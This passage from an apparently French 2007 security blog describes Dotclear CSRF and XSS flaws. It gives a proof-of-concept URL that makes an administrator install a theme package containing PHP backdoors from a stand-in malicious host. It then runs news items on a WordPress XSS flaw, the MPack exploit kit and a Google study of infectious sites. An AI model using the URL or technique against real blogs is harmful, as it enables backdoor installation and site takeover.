On retrouve cette même faille dans la partie du blog sui sert à gérer les thèmes. Encore une fois on peut faire supprimer, activer ou désactiver des thèmes à l’administrateur. On peut aussi lui faire ajouter de nouveaux thèmes contenant des fichier php qui serviraient de backdoor. Voici un proof of concept :
    

    http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/evil.pkg.gz&p=thememng
    

    Lorsque l’administrateur clique sur ce lien ou lorsqu’il qu’il visualise une page web(qui peut être la sienne) qui contient ce lien(dans une image ou une iframe par exemple), les backdoors écrites en php sont alors copiés sur le serveur visé.
    

    On peut faire mettre n’importe quoi à l’administrateur dans les champs de cette page:
    

    http://victim.com/dotclear/ecrire/tools.php?p=blogconf
    

    parce qu’encore une fois le blog ne vérifie pas la provenance des données, par ailleurs le champs contenant le nom du blog peut recevoir du code Javascript et peut par conséquent être utilisé pour mener à bien des attaques de type cross site scripting.
    

    Sur cette page:
    

    http://victim.com/dotclear/ecrire/tools.php?p=blogroll
    

    On peut faire placer des nouveaux liens ou des nouvelles rubriques à l’administrateur. On peut aussi lui faire effacer des liens ou des rubriques. Cette page présente aussi une faille Xss car on peut placer du code javascript dans ses champs et celui-ci est à chaque fois interprété (dans la partie admin). Le javascript inséré dans le champs “rubrique” est lui aussi interprété sur la 1ère la page du blog(page visible pour tout le monde).
    
Il est très facile de faire créer à l’administrateur des profiles d’utilisateurs ayant les mêmes pouvoirs que lui. Il suffit de lui faire visiter une page qui contient un code HTML similaire à celui-ci:
    

    ============================
    

    Lire la suite de l’article et des astuces sur le site officiel à la demande de l’auteur : http://ar3av.free.fr/faille-dotclear.php
    

    
    
    
  
    
    
    
    
     
      Nouvelle faille WordPress       
    
    
    
	Envoyé 30 mai 2007
    
	Classé dans : Sécurité | 
    
	* Commentaires (6)        
    
    
    
      
    Un internaute français découvre un nouveau problème de sécurité pour le logiciel web WordPress.
    

    
Il se nomme PsychoGun, un informaticien français. Il vient de découvrir la possibilité de nuire aux utilisateurs et blogs employant le système WordPress. Les versions affectées par cette faille sont : 2.1.3 et versions antérieures / 2.0.10 et versions antérieures / 2.2 et versions antérieures. La faille est de type XSS (permettant de prendre par exemple possession du serveur et de la base de données).
    
WordPress est un blog populaire écrit en PHP dans lequel l’internaute a découvert une nouvelle vulnérabilité. Cette application web permet aux utilisateurs et à son propriétaire de poster des commentaires à la suite d’articles que des rédacteurs produisent. Contrairement aux autres utilisateurs, l’administrateur du blog peut mettre du code javascript dans ses commentaires ainsi que quand ses articles; le problème se pose dans le fait que l’application ne vérifie pas convenablement la provenance de certaines données qui lui sont envoyées. Ainsi il est facile de faire poster au webmaster un commentaire comportant du javascript en l’invitant à visiter une page web comportant du code malveillant.
    

    En attendant un correctif, PsychoGun indique qu’il ne faut pas “surfer sur d’autres sites au sujet desquels vous n’êtes pas sûrs qu’ils sont dignes de confiance lorsque vous êtes connectés sur votre compte admin.
    
Imaginezle désastre de ce genre de faille sur les communautés tel que blogasty. Pour des raisons de sécurité, je ne donnerai pas plus de précision technique sur cette faille (vous me comprendrez).
    

    
    
    
  
    
    
    
    
     
      Un serveur pirate clé en main pour 700 dollars       
    
    
    
	Envoyé 23 mai 2007
    
	Classé dans : Sécurité | 
    
	* Laisser un commentaire        
    
    
    
      
     Virus et parasites
    

    Découverte de MPack, un outil pirate à installer sur un serveur web afin d’infecter automatiquement ses visiteurs. Vendu 700 dollars, MPack a tout d’un logiciel commercial traditionnel, jusqu’aux mises à jour payantes. MPack reconnaît la plupart des navigateurs courants et des systèmes d’exploitation.
    

     
    

    L’éditeur antivirus Panda Software livre une intéressante étude de MPack, un outil pirate destiné à infecter les visiteurs des sites sur lesquels il est installé.
    
Programmé en PHP, adossé à une base de données MySQL, MPack a tout d’une application web traditionnelle.
    
Seule différence : son rôle est d’exploiter une vulnérabilité sur le PC des visiteurs afin de leur déposer un code exécutable choisi par le pirate. Pour cela, MPack reconnaît les principaux systèmes d’exploitation, de Windows à MacOS en passant par Linux ou FreeBSD, ainsi que les principaux navigateurs. Chacune de ces combinaison peut se voir délivrer un exploit spécifique en fonction des codes d’attaque embarqués par la version installée.
    
L’infection dépend donc autant du système d’exploitation et du navigateur du visiteur que de la version de MPack. Mais selon Panda Software, les versions de l’outil se succèdent rapidement et embarquent régulièrement de nouveaux codes d’attaque à jour. Ces mises à jour sont payantes, facturées entre 50 et 150 dollars. Enfin, au moment de l’achat, l’auteur assure que MPack est indécelable par les antivirus du moment. Il propose de mettre à jour cette garantie à chaque nouvelle version pour 50 dollars. Il n’y a pas de doute, le piratage est bien entré dans l’ère du business !
    
MPack est essentiellement destiné à être installé sur des serveurs contrôlés par les pirates eux-mêmes (site de téléchargement de “cracks” logiciels, par exemple), ou d’autres détournés pour l’occasion afin de piéger leurs visiteurs légitimes. Il peut cependant aussi être déployé sur un site dédié qui ne recevra pas de visiteurs. Dans ce cas, les pirates devront ensuite s’introduire sur d’autres sites légitimes afin d’en modifier une page (souvent celle d’accueil). En y ajoutant des cadres HTML invisibles, ils pourront “inclure” l’attaque issue du serveur initial dans la page.
    
En bonne application web, MPack offre enfin des tableaux de bords soignés, qui permettent aux pirates de savoir qui, et où, sont leurs victimes et quelles attaques fonctionnent le mieux (ci-dessous).
    

    L'interface de MPack
    

    L’interface web de MPack propose des rapports détaillés du nombre d’infections et de l’origine des victimes. Source : Panda Software.
    
Cet outil n’exploite cependant pas de vulnérabilité magique : il se contente de “packager” celles déjà publiées, en intégrant leur code de démonstration (nul doute qu’il embarque au minimum celles répertoriées par Metasploit, l’outil préféré de la communauté !). Un ordinateur parfaitement à jour de ses correctifs de sécurité limitera ainsi grandement le risque d’être infecté via ce MPack.
    

    Info ! Plus d’informations :
    


      

      
    
      
  
      
    
      
    
       
      Google : 10% des résultats seraient infectieux       
      
    
      
	Envoyé 23 mai 2007
      
	Classé dans : Sécurité | 
      
	* Commentaires (1)        
      
    
      
      
      virus1 Selon une étude menée par Google, 10% des résultats renvoyés à l’issue d’une recherche mèneraient à des sites infectieux capables d’installer un code malicieux lors de leur visite.
      

      Une étude menée pendant un an par une équipe de chercheurs de Google met en lumière l’ampleur prise par le côté obscur du web. En sélectionnant 4,5 millions de pages de son propre index, l’éditeur a observé que 450.000 d’entre elles tentaient d’installer “à la volée” un code malicieux sur l’ordinateur du visiteur. Et 700.000 autres, soit 15%, seraient considérées comme douteuses, probablement liées à des activités malicieuses.
      

      Les pages ont été sélectionnées à l’issue d’une première analyse heuristique sur l’ensemble de l’index de Google, afin d’en identifier les plus suspectes. Les 4,5 millions d’entre elles arrivées en tête ont alors eu droit à une étude plus approfondie : des navigateurs automatisés, travaillant dans un environnement virtualisé, sont allés contrôler le comportement de la page web.
      

      Dix pourcent d’entre elles ont donc, à cette occasion, clairement tenté d’installer un programme exécutable sur le PC virtuel. L’équipe aura au passage découvert 200.000 codes malicieux différents durant cette étude. L’un d’eux était distribué à l’identique par 3200 adresses web. Plus vicieux encore, certains sites changeaient l’apparence de leur code malicieux chaque heure afin d’échapper aux anti-virus.
      

      Du côté des techniques d’infection, la majorité des attaques exploitent du code Javascript, souvent inclus depuis un autre site. L’étude cite ainsi le cas d’un compteur de visites gratuit qui a fonctionné correctement pendant quatre ans avant de se transformer en installateur de code malicieux pour les visiteurs de tous les sites qui l’utilisaient.
      
Bien entendu, les incontournable balises IFrame sont également de la partie, ainsi que les classiques attaques par injection sur des forums et autres lieux publics qui permettent aux internautes de partager du contenu.
      

      Cette étude, bien que rigoureuse et passionnante, n’est cependant pas inédite. Avant elle, McAfee s’était déjà intéressé aux sites web distributeurs de malware, avec sont service SiteAdvisor. Son analyse, moins fouillée, avait indiqué que 5% des sites étudiés étaient dangereux.
      
L’écart statistique entre les deux études peut s’expliquer par le fait que celle menée par Google s’appuie sur une base de sites suspects pré-sélectionnés. L’étude de McAfee apporte un éclairage intéressant : la majorité des pages malicieuses apparaissent dans les liens publicitaires et non dans les résultats naturels (dits “organiques“) fournis par les moteurs de recherche. Et oui, les pirates paient même pour vous infecter !
      

      Enfin, l’analyse de dangerosité des sites web n’est pas une activité nouvelle. Elle est par exemple le fond de commerce d’un éditeur comme Websense (plusieurs milliards d’adresses analysées et de sites décortiqués). Trend Micro, de son côté, y vient également depuis peu avec un service de “réputation” des sites web. Google souhaite également se servir des résultats de ces travaux afin de signaler les sites dangereux aux internautes lors de l’affichage des résultats de leur recherche.
      

      Pour les plus curieux, l’étude des chercheurs de Google est cependant une lecture passionnante – et à jour – qui met en lumière les différentes techniques d’infections abondamment utilisées aujourd’hui sur le web pour piéger les internautes.
      

      Source : Abondance